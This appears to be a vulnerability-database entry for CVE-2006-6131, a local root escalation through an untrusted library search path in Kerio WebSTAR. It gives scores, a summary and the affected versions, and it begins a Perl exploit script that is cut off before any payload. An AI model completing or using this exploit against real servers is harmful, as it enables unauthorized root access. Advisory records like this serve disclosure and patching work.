
CVE-2006-6131

Published: 28/11/2006 Updated: 07/11/2023
CVSS v2 Base Score: 6.2 | Impact Score: 10 | Exploitability Score: 1.9
VMScore: 625
Vector: AV:L/AC:H/Au:N/C:C/I:C/A:C

Vulnerability Summary

Untrusted search path vulnerability in (1) WSAdminServer and (2) WSWebServer in Kerio WebSTAR (4D WebSTAR Server Suite) 5.4.2 and previous versions allows local users with webstar privileges to gain root privileges via a malicious libucache.dylib helper library in the current working directory.

Vulnerable Product

kerio webstar 5.4

kerio webstar 5.3

kerio webstar 4.0

kerio webstar 5.3.1

kerio webstar 5.2.3

kerio webstar 5.3.4

kerio webstar 5.1.3

kerio webstar 5.2.4

kerio webstar 5.2.1

kerio webstar

kerio webstar 5.1.2

kerio webstar 5.2

kerio webstar 5.2.2

kerio webstar 5.3.2

kerio webstar 5.3.3

Exploits

#!/usr/bin/perl
#
# www.digitalmunition.com
# written by kf (kf_lists[at]digitalmunition[dot]com)
#
# you must have access to the webstar user or be in the admin group
#
# This is currently not patched. chmod -s your kerio binaries
foreach $key (keys %ENV) { delete $ENV{$key}; }
$tgts{"0"} = "kerio-webstar-542-macbin - WSAdminSer ...